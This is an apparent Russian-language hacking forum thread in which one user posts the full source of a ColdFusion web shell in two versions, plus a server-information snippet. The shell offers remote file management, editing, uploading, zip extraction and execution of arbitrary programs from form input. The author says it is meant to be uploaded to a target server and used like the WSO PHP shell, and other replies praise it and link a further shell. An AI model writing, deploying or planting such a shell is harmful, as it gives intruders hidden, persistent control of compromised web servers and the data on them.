CFMshell

Seravin · 5 Nov 2010

Облазив интернет в поисках cfm шелла, я так и не нашел ничего кроме одного шелла, который я думаю все знают: это шелл в котором можно запустить файл. Но в моём случае нельзя было запустить файлы, поэтому пришлось писать свой шелл.

CFMshell v. 1.0
- файлменеджер(удаление, переинование файлов/директорий, создание директорий)
- редактирование файлов
- заливка файлов
- запуск файлов

http://pastebin.com/hKS5k792

Code:

<html>

<style>
  td {border:1px solid black;}
  table {border-collapse: collapse;}
  #header {background-color: black;color:white;}
  #header td { border-color:white; }
  a {color:black}
  </style>

<body>



<cfif isdefined("Form.cmd")>
<cfset CP="#Form.cmd#">
	<cfif isdefined("Form.act")>
		<cfset actn = "#Form.act#">
		<cfif actn is "D">
			<cfdirectory directory = "#CP#" action = "delete">
			<cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#">
		<cfelse>
			<cfif actn is "R">
				<cfdirectory directory = "#CP#" action = "rename" newDirectory = "#Form.dirname#">
				<cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#">
			<cfelse>
				<cfif actn is "S">
					<cffile action = "write" file = "#CP#" output = "#Form.fcontents#">
					<cfset CP="#getDirectoryFromPath(CP)#">
				<cfelse>
					<cfif actn is "FD">
						<cffile action = "delete" file = "#CP#">
						<cfset CP="#getDirectoryFromPath(CP)#">						
					<cfelse>
						<cfif actn is "FR">
							<cffile action = "rename" source = "#CP#" destination = "#getDirectoryFromPath(CP) & Form.dirname#" >
							<cfset CP="#getDirectoryFromPath(CP)#">							
						</cfif>
					</cfif>	
				</cfif>
			</cfif>
		</cfif>
	</cfif>
<cfelse>
	<cfset currentPath = getCurrentTemplatePath()>
	<cfset currentDirectory = getDirectoryFromPath(currentPath)><cfset CP="#currentDirectory#">
</cfif>

<cfif isdefined("Form.fname")>	
	<cfset fn = "#Form.fname#">
	<cfif GetFileFromPath(fn) is not "">
	<cfif fn is not "">
		<cfsavecontent variable="sc">
		<cfexecute name = "#Form.fname#" arguments = "#Form.opts#">
		</cfexecute>
		</cfsavecontent>		
	</cfif>
	</cfif>
</cfif>

<cfif GetFileFromPath(CP) is "">

<cfif isdefined("Form.FiletoUpload")>
<cfset ftu = "#Form.FiletoUpload#">
<cfif ftu is not ""> <cffile action="upload" destination="#CP#" nameConflict="overwrite" fileField="Form.FiletoUpload"> </cfif>
</cfif>

<cfif isdefined("Form.newdir")>
<cfset ftu = "#Form.newdir#">
<cfif ftu is not ""><cfdirectory directory = "#CP & Form.newdir#" action = "create"></cfif>
</cfif>

<cfif isdefined("sc")>
<cfif sc is not "">
	<cfoutput><p>#sc#</p></cfoutput>
</cfif>
</cfif>

<form method="POST" name="frm" enctype="multipart/form-data">
<table>
<tr><td width="100px">Current dir</td><td><input type=text name="cmd" id="cmd" size=50 <cfoutput>value = "#CP#" </cfoutput> ></td></tr>
<tr><td>Upload file</td><td><input type="file" name="FiletoUpload" size="50"></td></tr>
<tr><td>Create dir</td><td><input type=text name="newdir" size=50></td></tr>
<tr><td></td></tr>
<tr><td>Filename to exec:</td><td><input type=text name="fname" size=50 value="<cfoutput>#CP#</cfoutput>"></td></tr>
<tr><td>Options:</td><td><input type=text name="opts" size=50></td></tr>
<tr><td><input type="submit" value="Do it!"></td></tr>
</table>

<input type="hidden" name="act" id="act" value="" />
<input type="hidden" name="dirname" id="dirname" value="" />
<table width="100%">
 <tr id="header"><td width="*">Name</td><td width="100px">Size</td><td width="100px">Type</td><td width="100px">Modified</td><td width="100px">Attr</td><td width="100px">Mode</td><td width="100px">Action</td></tr>
 <tr><td><cfoutput><a href="javascript:document.getElementById('cmd').value='#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#';document.frm.submit()"><b>[..]</b></a></cfoutput></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<cfdirectory action="list" directory="#CP#" name="directories" sort="name ASC" type="dir">

<cfoutput query="directories">
<tr>
    <td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.frm.submit()"><b>[#directories.name#]</b></a></td>
    <td>#directories.size#</td>
    <td>#directories.type#</td>
    <td>#directories.dateLastModified#</td>    
    <td>#directories.attributes#</td>
	<td>#directories.mode#</td>
	<td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='D';document.frm.submit()"><b>D</b></a>&nbsp;&nbsp;&nbsp;<a href="javascript:var newdirname = prompt('Enter new dir name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='R';document.getElementById('dirname').value=newdirname;document.frm.submit(); }"><b>R</b></a></td>
</tr>
</cfoutput>

<cfdirectory action="list" directory="#CP#" name="files" sort="name ASC" type="file">

<cfoutput query="files">
<tr>
    <td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.frm.submit()">#files.name#</a></td>
    <td>#files.size#</td>
    <td>#files.type#</td>
    <td>#files.dateLastModified#</td>    
    <td>#files.attributes#</td>
	<td>#files.mode#</td>
	<td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FD';document.frm.submit()">D</a>&nbsp;&nbsp;&nbsp;<a href="javascript:var newdirname = prompt('Enter new file name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FR';document.getElementById('dirname').value=newdirname;document.frm.submit(); }">R</a></td>
</tr>
</cfoutput>

</table>
<cfelse>
<cffile action="read" file="#CP#" variable="Fcont">
<form method="POST" name="frm">
<input type="hidden" name="cmd" id="cmd" value="<cfoutput>#CP#</cfoutput>">
<input type="hidden" name="act" id="act" value="">

<textarea name="fcontents" style="width:100%;height:400px">
<cfoutput> #Fcont# </cfoutput>
</textarea>
<div><button onclick="document.getElementById('act').value='s';document.frm.submit();">Save</button><button onclick="document.getElementById('cmd').value='<cfoutput>#getDirectoryFromPath(CP)#</cfoutput>';document.frm.submit();">Back</button></div>
</cfif>
</form>
</body>
</html>

З.Ы. сильно не пинайте, ибо coldfusion я не знаю совсем

Konqi · 5 Nov 2010

лучше чем ничего, молодец

Seravin · 23 Nov 2010

CFMshell v. 1.1

- устранил баг со слеширование на windows платформе(крокозяблы получались всякие)
- устарнил баг с просмотром файлов, если в них есть textarea
- добавил возможно разархивирования zip-архивов(CF 8+ если не ошибаюсь)
- сделал более приятный интерфейс

_http://pastebin.com/pu04UCq9

Code:

<html>

<style>
#rounded-corner {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;}
#current-path {font-family: "Lucida Sans Unicode", "Lucida Grande", Sans-Serif;font-size: 12px;width: 100%;text-align: left;border-collapse: collapse;margin:0px;margin-bottom:2px;padding:10px 0px;background:#b9c9fe}
#rounded-corner thead th.rounded-q1 {background: #b9c9fe;}
#rounded-corner thead th.rounded-q4 {background: #b9c9fe;width:100px}
#rounded-corner th {padding: 8px;font-weight: normal;font-size: 13px;color: #039;background: #b9c9fe;}
#rounded-corner td {padding: 8px;background: #e8edff;border-top: 1px solid #fff;color: #669;}
#rounded-corner tbody tr:hover td {background: #d0dafd;}
a {color:black}
  </style>

<cfif isdefined("Form.cmd")>
<cfset CP="#Replace(Form.cmd,"\","/","all")#">
	<cfif isdefined("Form.act")>
		<cfset actn = "#Form.act#">
		<cfif actn is "D">
			<cfdirectory directory = "#CP#" action = "delete">
			<cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#">
		<cfelse>
			<cfif actn is "R">
				<cfdirectory directory = "#CP#" action = "rename" newDirectory = "#Form.dirname#">
				<cfset CP="#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#">
			<cfelse>
				<cfif actn is "S">
					<cffile action = "write" file = "#CP#" output = "#Form.fcontents#">
					<cfset CP="#getDirectoryFromPath(CP)#">
				<cfelse>
					<cfif actn is "FD">
						<cffile action = "delete" file = "#CP#">
						<cfset CP="#getDirectoryFromPath(CP)#">						
					<cfelse>
						<cfif actn is "FR">
							<cffile action = "rename" source = "#CP#" destination = "#getDirectoryFromPath(CP) & Form.dirname#" >
							<cfset CP="#getDirectoryFromPath(CP)#">							
						</cfif>
					</cfif>	
				</cfif>
			</cfif>
		</cfif>
	</cfif>
<cfelse>
	<cfset currentPath = getCurrentTemplatePath()>
	<cfset currentDirectory = getDirectoryFromPath(currentPath)><cfset CP="#Replace(currentDirectory,"\","/","all")#">
</cfif>

<cfif isdefined("Form.fname")>	
	<cfset fn = "#Form.fname#">
	<cfif GetFileFromPath(fn) is not "">
	<cfif fn is not "">
		<cfsavecontent variable="sc">
		<cfexecute name = "#Form.fname#" arguments = "#Form.opts#">
		</cfexecute>
		</cfsavecontent>		
	</cfif>
	</cfif>
</cfif>

<cfif GetFileFromPath(CP) is "">

<cfif isdefined("Form.FiletoUpload")>
<cfset ftu = "#Form.FiletoUpload#">
<cfif ftu is not ""> <cffile action="upload" destination="#CP#" nameConflict="overwrite" fileField="Form.FiletoUpload"> </cfif>
</cfif>

<cfif isdefined("Form.zname")>
	<cfset zn = "#Form.zname#">
	<cfset ftu = "#Form.ftunpack#">	
		<cfif GetFileFromPath(zn) is not "">
			<cfzip file="#zn#" action="unzip" destination="#ftu#">
		</cfif>
</cfif>

<cfif isdefined("Form.newdir")>
<cfset ftu = "#Form.newdir#">
<cfif ftu is not ""><cfdirectory directory = "#CP & Form.newdir#" action = "create"></cfif>
</cfif>

<cfif isdefined("sc")>
<cfif sc is not "">
	<cfoutput><p>#sc#</p></cfoutput>
</cfif>
</cfif>
<body>
<form method="POST" name="frm" enctype="multipart/form-data">
<div id="current-path"><div style="width:20%;float:left;padding-left:10px">Current dir</div><div><input style="width:70%" type=text name="cmd" id="cmd" size=50 <cfoutput>value = "#CP#" </cfoutput> ></div></div>
<div id="current-path"><div style="width:20%;float:left;padding-left:10px">Upload file</div><div><input type="file" name="FiletoUpload" style="width:70%"></div></div>
<div id="current-path"><div style="width:20%;float:left;padding-left:10px">Create dir</div><div><input type=text name="newdir" style="width:70%"></div></div>
<div id="current-path">
<div style="width:20%;float:left;padding-left:10px">Filename to exec</div><div><input type=text name="fname" style="width:70%" value="<cfoutput>#CP#</cfoutput>"></div>
<div style="width:20%;float:left;padding-left:10px">Options</div><div><input type=text name="opts" style="width:70%"></div>
</div>
<div id="current-path">
<div style="width:20%;float:left;padding-left:10px">Zip archive</div><div><input type=text name="zname" style="width:70%" value="<cfoutput>#CP#</cfoutput>"></div>
<div style="width:20%;float:left;padding-left:10px">Folder to unpack</div><div><input type=text name="ftunpack" style="width:70%" value="<cfoutput>#CP#</cfoutput>"></div>
</div>
<div id="current-path" style="margin-bottom:20px"><div style="width:200px;margin:0px auto"><input type="submit" value="Do it!" style="width:200px"></div></div>

<input type="hidden" name="act" id="act" value="" />
<input type="hidden" name="dirname" id="dirname" value="" />
<table id="rounded-corner">
<thead><tr><th scope="col" class="rounded-q1">Name</th><th scope="col" class="rounded-q4">Size</th><th scope="col" class="rounded-q4">Type</th><th scope="col" class="rounded-q4">Modified</th><th scope="col" class="rounded-q4">Attributes</th><th scope="col" class="rounded-q4">Mode</th><th scope="col" class="rounded-q4">Action</th></tr></thead>
 <tr><td><cfoutput><a href="javascript:document.getElementById('cmd').value='#CP.ReplaceFirst("([^\\\/]+[\\\/]){1}$", "")#';document.frm.submit()"><b>[..]</b></a></cfoutput></td><td></td><td></td><td></td><td></td><td></td><td></td></tr>
<cfdirectory action="list" directory="#CP#" name="directories" sort="name ASC" type="dir">
<tbody>
<cfoutput query="directories">
<tr>
    <td><a href="javascript:document.getElementById('cmd').value='#CP &  directories.name#/';document.frm.submit()"><b>[#directories.name#]</b></a></td>
    <td>#directories.size#</td>
    <td>#directories.type#</td>
    <td>#directories.dateLastModified#</td>    
    <td>#directories.attributes#</td>
	<td>#directories.mode#</td>
	<td><a href="javascript:document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='D';document.frm.submit()"><b>Del</b></a>&nbsp;&nbsp;&nbsp;<a href="javascript:var newdirname = prompt('Enter new dir name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & directories.name#/';document.getElementById('act').value='R';document.getElementById('dirname').value=newdirname;document.frm.submit(); }"><b>Rnm</b></a></td>
</tr>
</cfoutput>

<cfdirectory action="list" directory="#CP#" name="files" sort="name ASC" type="file">

<cfoutput query="files">
<tr>
    <td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.frm.submit()">#files.name#</a></td>
    <td>#files.size#</td>
    <td>#files.type#</td>
    <td>#files.dateLastModified#</td>    
    <td>#files.attributes#</td>
	<td>#files.mode#</td>
	<td><a href="javascript:document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FD';document.frm.submit()">Del</a>&nbsp;&nbsp;&nbsp;<a href="javascript:var newdirname = prompt('Enter new file name : ', 'here');if (newdirname!=='') {document.getElementById('cmd').value='#CP & files.name#';document.getElementById('act').value='FR';document.getElementById('dirname').value=newdirname;document.frm.submit(); }">Rnm</a></td>
</tr>
</cfoutput>
</tbody>
</table>
</body>
<cfelse>
<body style="background:#b9c9fe">
<cffile action="read" file="#CP#" variable="Fcont">
<cfoutput>
<div style="font-size:16px;padding:20px;0px;font-weight:bold">#CP#</div>
</cfoutput>
<form method="POST" name="frm">
<input type="hidden" name="cmd" id="cmd" value="<cfoutput>#CP#</cfoutput>">
<input type="hidden" name="act" id="act" value="">

<textarea name="fcontents" style="width:100%;height:400px">
<cfoutput> #HTMLEditFormat(Fcont)# </cfoutput>
</textarea>
<div style="margin-top:20px"><button onclick="document.getElementById('act').value='s';document.frm.submit();" style="width:100px;margin-right:20px">Save</button><button onclick="document.getElementById('cmd').value='<cfoutput>#getDirectoryFromPath(CP)#</cfoutput>';document.frm.submit();" style="width:100px">Back</button></div>
</body>
</cfif>
</form>
</html>

andreipup · 24 Nov 2010

Объясните как юзать его)?

Seravin · 24 Nov 2010

эмм... а что непонятного? cfm -> coldfusion -> заливаем аля shell.cfm и юзаем
аналогия: php->php->заливаем wso2.php и юзаем

Seravin · 9 Jan 2011

вывод информации о сервере(пока всё что нашёл)

Code:

<table>
<cfoutput>
	<tr><td colspan="2">CGI server variable</td></tr>
	<tr><td>SERVER_SOFTWARE</td><td>#CGI.SERVER_SOFTWARE#</td></tr>
	<tr><td>SERVER_NAME</td><td>#CGI.SERVER_NAME#</td></tr>
	<tr><td>GATEWAY_INTERFACE</td><td>#GATEWAY_INTERFACE#</td></tr>
	<tr><td>SERVER_PROTOCOL</td><td>#CGI.SERVER_PROTOCOL#</td></tr>
	<tr><td>SERVER_PORT</td><td>#CGI.SERVER_PORT#</td></tr>
	<tr><td>REQUEST_METHOD</td><td>#CGI.REQUEST_METHOD#</td></tr>
	<tr><td>PATH_INFO</td><td>#CGI.PATH_INFO#</td></tr>
	<tr><td>PATH_TRANSLATED</td><td>#CGI.PATH_TRANSLATED#</td></tr>
	<tr><td>SCRIPT_NAME</td><td>#CGI.SCRIPT_NAME#</td></tr>
	<tr><td>QUERY_STRING</td><td>#CGI.QUERY_STRING#</td></tr>
	<tr><td>REMOTE_HOST</td><td>#CGI.REMOTE_HOST#</td></tr>
	<tr><td>REMOTE_ADDR</td><td>#CGI.REMOTE_ADDR#</td></tr>
	<tr><td>AUTH_TYPE</td><td>#CGI.AUTH_TYPE#</td></tr>
	<tr><td>REMOTE_USER</td><td>#CGI.REMOTE_USER#</td></tr>
	<tr><td>AUTH_USER</td><td>#CGI.AUTH_USER#</td></tr>
	<tr><td>REMOTE_IDENT</td><td>#CGI.REMOTE_IDENT#</td></tr>
	<tr><td>CONTENT_TYPE</td><td>#CGI.CONTENT_TYPE#</td></tr>
	<tr><td>CONTENT_LENGTH</td><td>#CGI.CONTENT_LENGTH#</td></tr>
	<tr><td colspan="2">Server variables</td></tr>
	<tr><td>Product Name</td><td>#Server.ColdFusion.ProductName#</td></tr>
	<tr><td>Product Level</td><td>#Server.ColdFusion.ProductLevel#</td></tr>
	<tr><td>Supported Locales</td><td>#Server.ColdFusion.SupportedLocales#</td></tr>
	<tr><td>OS Name</td><td>#Server.OS.Name#</td></tr>
	<tr><td>OS Additional Information</td><td>#Server.OS.AdditionalInformation#</td></tr>
	<tr><td>OS Version</td><td>#Server.OS.Version#</td></tr>
	<tr><td>OS BuildNumber</td><td>#Server.OS.BuildNumber#</td></tr>
</cfoutput>
</table>

Expl0ited · 9 Jan 2011

Мне кажется проще использовать asp шелл, т.к. 90% coldfusion стоит на Windows платформах на которых крутится IIS (который без особых усилий работает с asp). Оставшиеся 10% стоят на linux из под apache и как это часто бывает с установленным php интерпретатором.
А вообще молодец, может и пригодится.

Konqi · 19 Oct 2012

нашел очень неплохой шелл на cfm, автор "Sebastien Denis"

файловый менеджер, выполнение системных команд, выполнение запросов к базе. очень удобно вобщем. дерзайте

http://pastebin.com/jk9HPX3A

CFMshell

Seravin Active Member

Konqi Green member

Seravin Active Member

andreipup Elder - Старейшина

Seravin Active Member

Seravin Active Member

Expl0ited Members of Antichat

Konqi Green member

Useful Searches

CFMshell

Seravin Active Member

Konqi Green member

Seravin Active Member

andreipup Elder - Старейшина

Seravin Active Member

Seravin Active Member

Expl0ited Members of Antichat

Konqi Green member